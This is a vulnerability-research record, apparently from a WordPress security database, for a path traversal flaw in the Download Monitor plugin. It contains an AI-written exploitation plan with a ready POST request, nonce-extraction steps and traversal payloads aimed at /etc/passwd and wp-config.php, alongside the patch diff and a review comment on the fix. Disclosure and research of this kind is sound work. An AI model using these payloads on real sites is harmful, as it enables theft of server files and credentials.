[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fc8F1BhyuX-1XBq4hRId64Aw0tdJtGzGsM5BBwDhfTlQ":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":27,"research_verified":28,"research_rounds_completed":29,"research_plan":30,"research_summary":31,"research_vulnerable_code":32,"research_fix_diff":33,"research_exploit_outline":34,"research_model_used":35,"research_started_at":36,"research_completed_at":37,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":28,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":28,"source_links":38},"CVE-2026-39489","download-monitor-authenticated-author-arbitrary-file-download","Download Monitor \u003C= 5.1.9 - Authenticated (Author+) Arbitrary File Download","The Download Monitor plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 5.1.9. 
This makes it possible for authenticated attackers, with Author-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.","download-monitor",null,"\u003C=5.1.9","5.1.10","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","2026-04-20 00:00:00","2026-04-30 15:38:28",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fba111255-3b91-4ef6-8d57-10ff08363c48?source=api-prod",11,[22,23,24,25,26],"changelog.txt","download-monitor.php","readme.txt","src\u002FAdmin\u002FMediaInsert.php","vendor\u002Fcomposer\u002Finstalled.php","researched",false,3,"# Exploitation Research Plan - CVE-2026-39489\n\n## 1. Vulnerability Summary\nThe **Download Monitor** plugin (up to 5.1.9) is vulnerable to **Path Traversal** and **Arbitrary File Download**. The vulnerability exists in the \"Quick-add\" download functionality within the Media Browser interface. Specifically, the plugin fails to properly validate the `download_url` parameter provided during the creation of a new download. This allows an authenticated user with sufficient privileges (Author and above, or any user with the `manage_downloads` capability) to create a download entry pointing to sensitive files on the server (e.g., `\u002Fetc\u002Fpasswd`, `wp-config.php`). Once created, the attacker can download these files through the plugin's frontend download mechanism.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `wp-admin\u002Fmedia-upload.php?tab=quick-add` (Action triggered by `media_upload_add_download` hook)\n- **HTTP Method:** `POST`\n- **Vulnerable Parameter:** `download_url`\n- **Authentication:** Author level or any user with `manage_downloads` capability.\n- **Preconditions:** The attacker must have access to the Media Browser's \"Insert Download\" interface.\n\n## 3. Code Flow\n1. 
**Entry Point:** The class `DLM_Admin_Media_Insert` (in `src\u002FAdmin\u002FMediaInsert.php`) registers the `media_upload_add_download` hook (line 34) which calls the `media_browser()` method.\n2. **Access Control:** The `media_browser()` method checks if the current user has the `manage_downloads` capability (line 99).\n3. **Form Processing:** If a `POST` request is sent with `download_url` and `download_title`, the method verifies the nonce `quick-add-nonce` (line 104).\n4. **Post Creation:**\n   - It creates a new `dlm_download` post (line 120).\n   - It creates a corresponding `dlm_download_version` post (line 139).\n5. **Path Resolution:** The plugin instantiates `DLM_File_Manager` and calls `$file_manager->get_secure_path( $url )` using the user-provided `$url` (line 152).\n6. **Persistence:** The resulting `$file_path` (which remains unvalidated for path traversal) is stored in the `_files` meta field of the `dlm_download_version` post (line 157).\n7. **Exploitation Sink:** When a user requests the download via `\u002F?download=[ID]`, the plugin retrieves the path from the `_files` meta and serves the file content without checking if the file resides within an allowed directory.\n\n## 4. Nonce Acquisition Strategy\nThe nonce is required for the `quick-add` action. It is generated using `wp_create_nonce( 'quick-add' )` and embedded in the HTML of the Media Browser frame.\n\n1. **Navigate to the Media Browser:** Open the \"Insert Download\" frame.\n   - URL: `wp-admin\u002Fmedia-upload.php?type=add_download&tab=quick-add`\n2. **Extract Nonce:** Use the browser context to read the value of the hidden input field.\n   - **JavaScript:** `document.querySelector('input[name=\"quick-add-nonce\"]').value`\n   - **Tool:** `browser_eval(\"document.querySelector('input[name=\\\"quick-add-nonce\\\"]').value\")`\n\n## 5. Exploitation Strategy\n1. **Setup User:** Log in as a user with the `author` role. 
Ensure the role has `manage_downloads` (standard for Download Monitor configurations).\n2. **Get Nonce:** Navigate to the Media Upload page and extract the `quick-add` nonce.\n3. **Create Malicious Download:** Send a `POST` request to `wp-admin\u002Fmedia-upload.php?type=add_download&tab=quick-add` to create a download pointing to `\u002Fetc\u002Fpasswd`.\n4. **Identify Download ID:** Use the response or WP-CLI to find the ID of the newly created `dlm_download`.\n5. **Read File:** Navigate to the download URL on the frontend to retrieve the file content.\n\n### HTTP Request (Step 3):\n```http\nPOST \u002Fwp-admin\u002Fmedia-upload.php?type=add_download&tab=quick-add HTTP\u002F1.1\nHost: [TARGET_HOST]\nContent-Type: application\u002Fx-www-form-urlencoded\nCookie: [AUTH_COOKIES]\n\ndownload_url=\u002Fetc\u002Fpasswd&download_title=SystemData&download_version=1.0&quick-add-nonce=[EXTRACTED_NONCE]\n```\n\n## 6. Test Data Setup\n1. **Plugin:** Install and activate Download Monitor 5.1.9.\n2. **User:** \n   - `wp user create attacker attacker@example.com --role=author --user_pass=password`\n   - `wp cap add author manage_downloads` (To satisfy the `current_user_can('manage_downloads')` check in `src\u002FAdmin\u002FMediaInsert.php`).\n3. **Configuration:** No specific settings required, as the vulnerability is in the default \"Quick-add\" logic.\n\n## 7. Expected Results\n- The `POST` request should return a success message in the HTML: `\u003Cdiv class=\"updated\">\u003Cp>Download successfully created.\u003C\u002Fp>\u003C\u002Fdiv>`.\n- A new `dlm_download` post and `dlm_download_version` post will be visible in the database.\n- Requesting `\u002F?download=[ID]` will return the contents of the server's `\u002Fetc\u002Fpasswd` file.\n\n## 8. Verification Steps\n1. 
**Database Check:** Verify the file path is stored.\n   ```bash\n   # Find the ID of the latest version\n   VERSION_ID=$(wp post list --post_type=dlm_download_version --posts_per_page=1 --orderby=ID --order=DESC --field=ID)\n   # Check the meta value\n   wp post meta get $VERSION_ID _files\n   ```\n   *Result should be a JSON-encoded string containing `\"\u002Fetc\u002Fpasswd\"`.*\n2. **Download Check:** \n   - Locate the parent Download ID (`post_parent` of the version).\n   - Use the `http_request` tool to fetch `GET \u002F?download=[ID]`.\n   - Confirm the response contains `root:x:0:0:`.\n\n## 9. Alternative Approaches\n- **Path Variants:** If absolute paths are blocked, try relative traversal: `..\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002Fetc\u002Fpasswd`.\n- **Protocol Wrappers:** If the plugin validates paths but not schemes, try `file:\u002F\u002F\u002Fetc\u002Fpasswd`.\n- **WordPress Config:** Target `wp-config.php` (relative to the WordPress root) to extract database credentials: `download_url=..\u002Fwp-config.php`.\n- **REST API:** Check if the REST API version creation (`\u002Fwp-json\u002Fdownload-monitor\u002Fv1\u002Fdownloads`) is similarly unprotected, as hinted by the `DLM_File_Manager` usage.","The Download Monitor plugin for WordPress is vulnerable to Path Traversal in versions up to 5.1.9 via the 'Quick-add' download feature. This allows authenticated attackers with Author-level access or the 'manage_downloads' capability to create download records pointing to sensitive local files (like \u002Fetc\u002Fpasswd or wp-config.php) and subsequently download them via the plugin's frontend mechanism.","\u002F\u002F src\u002FAdmin\u002FMediaInsert.php:82\n\t\t\u002F\u002F phpcs:ignore\n\t\tif ( ! empty( $_POST['download_url'] ) && ! 
empty( $_POST['download_title'] ) && isset( $_POST['quick-add-nonce'] ) && wp_verify_nonce( $_POST['quick-add-nonce'], 'quick-add' ) ) {\n\n\t\t\t$url     = esc_url_raw( wp_unslash( $_POST['download_url'] ) );\n\t\t\t$title   = sanitize_text_field( wp_unslash( $_POST['download_title'] ) );\n\t\t\t$version = isset( $_POST['download_version'] ) ? sanitize_text_field( wp_unslash( $_POST['download_version'] ) ) : '';\n\n\t\t\ttry {\n        \u002F\u002F ...\n\t\t\t\t\t\u002F\u002F File Manager\n\t\t\t\t\t$file_manager = new DLM_File_Manager();\n\t\t\t\t\t\n\t\t\t\t\tlist( $file_path )  = $file_manager->get_secure_path( $url );\n\n\t\t\t\t\t\u002F\u002F Meta\n\t\t\t\t\tupdate_post_meta( $file_id, '_version', $version );\n\t\t\t\t\tupdate_post_meta( $file_id, '_filesize', $file_manager->get_file_size( $file_path ) );\n\t\t\t\t\tupdate_post_meta( $file_id, '_files', $file_manager->json_encode_files( array( $file_path ) ) );","--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fdownload-monitor\u002F5.1.9\u002Fsrc\u002FAdmin\u002FMediaInsert.php\t2024-11-28 14:28:34.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fdownload-monitor\u002F5.1.10\u002Fsrc\u002FAdmin\u002FMediaInsert.php\t2026-03-05 07:46:28.000000000 +0000\n@@ -82,6 +82,10 @@\n \t\t\u002F\u002F phpcs:ignore\n \t\tif ( ! empty( $_POST['download_url'] ) && ! empty( $_POST['download_title'] ) && isset( $_POST['quick-add-nonce'] ) && wp_verify_nonce( $_POST['quick-add-nonce'], 'quick-add' ) ) {\n \n+\t\t\tif ( ! current_user_can( 'manage_downloads' ) ) {\n+\t\t\t\twp_die( esc_html__( 'You do not have sufficient permissions to perform this action.', 'download-monitor' ) );\n+\t\t\t}\n+\n \t\t\t$url     = esc_url_raw( wp_unslash( $_POST['download_url'] ) );\n \t\t\t$title   = sanitize_text_field( wp_unslash( $_POST['download_title'] ) );\n \t\t\t$version = isset( $_POST['download_version'] ) ? 
sanitize_text_field( wp_unslash( $_POST['download_version'] ) ) : '';","1. Authenticate as an Author or any user with the 'manage_downloads' capability.\n2. Access the Media Browser interface at 'wp-admin\u002Fmedia-upload.php?type=add_download&tab=quick-add' to retrieve a valid 'quick-add-nonce' from the hidden HTML input.\n3. Send a POST request to the same endpoint ('wp-admin\u002Fmedia-upload.php?type=add_download&tab=quick-add') with the 'download_url' parameter set to the target sensitive file path (e.g., '\u002Fetc\u002Fpasswd' or '..\u002Fwp-config.php').\n4. Observe the response to identify the ID of the newly created download (dlm_download post type).\n5. Visit the site frontend and request the download via the URL '\u002F?download=[ID]' to retrieve the contents of the sensitive file.","gemini-3-flash-preview","2026-05-04 19:57:31","2026-05-04 19:58:31",{"type":39,"vulnerable_version":40,"fixed_version":11,"vulnerable_browse":41,"vulnerable_zip":42,"fixed_browse":43,"fixed_zip":44,"all_tags":45},"plugin","5.1.9","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdownload-monitor\u002Ftags\u002F5.1.9","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdownload-monitor.5.1.9.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdownload-monitor\u002Ftags\u002F5.1.10","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdownload-monitor.5.1.10.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdownload-monitor\u002Ftags"]
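Review bot: the `current_user_can( 'manage_downloads' )` gate added in the `src/Admin/MediaInsert.php` hunk only narrows who can reach the quick-add branch; the unchanged context lines still take `$url` straight from `$_POST['download_url']` through `esc_url_raw()` and, per the surrounding code, hand it to `get_secure_path()` with no visible check that the resolved file sits inside an allowed directory, so the fix rests entirely on the capability. Consider also validating the resolved path against the permitted base directory (e.g. the uploads directory) before it is persisted to `_files`, and passing a response code such as 403 to `wp_die()` so the denied request is distinguishable in server logs.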